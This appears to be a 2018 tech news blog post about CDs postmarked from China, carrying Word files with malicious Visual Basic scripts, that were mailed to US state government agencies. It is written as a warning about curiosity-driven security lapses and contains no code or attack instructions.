Recently, Cisco and Huawei had faced a major breach in their routers where attackers used two different bypass methods. Hackers managed to compromise Cisco routers through a backdoor attack while Huawei was a victim of botnets. This year has been crucial for big players targeted with modern cyber attacks like Meltdown and Spectre. Who would have ever imagined a CD being the cause of a security breach in the year 2018. However, this time hackers have taken an old school approach or must I say one of the most unexpected methods of opening a backdoor to sensitive information. Packages with China postmarks had ended-up at several local and state government offices. The envelope contained a rambling letter and a small CD. The letter included lengthy paragraphs about fireworks, parades, and film industry but nothing in particular. While the CD contained a set of Word files that consisted of script-based malware. These scripts were supposed to run when the government officials would access them on their computers, eventually compromising that system. Well, people usually end up with blunders when they are confused or curious. The hackers knew exactly how to kick the victims curiosity and confusion into high gear. Until now, State Department of Cultural Affairs, State Historical Societies, and State Archives have received these packages addressed specifically to them. The MS-ISAC claim that these CDs included Mandarin language Microsoft Word (.doc) files from which a few include malicious Visual Basic scripts. It’s not very clear if anyone was tricked into inserting the disk in government systems. Well, it's common sense that you don’t insert a random disk into your system, but that’s not always the case. In 2016, a study found 50% of people plugging-in random USB devices into their system found at public places. The government agencies receiving these packages look quite strange but may be the hackers are looking at breaching a system where they won’t be detected easily; the perfect spot to quickly attack a bigger target. Human curiosity can lead to an invention or a disaster, but, in the security chain, humans are considered as the most delicate link. It’s quite obvious to not insert a random storage device into your systems, but here the hackers have shelled a little cash to target victims still using CD-ROMs in this modern age.  Now the only thing state agencies can hope for is that no one accidentally or out of curiosity inserts disks or USB devices of unknown origin into government systems. Related Links Top 5 cybersecurity trends you should be aware of in 2018 Intel’s Spectre variant 4 patch impacts CPU performance NetSpectre attack exploits data from CPU memory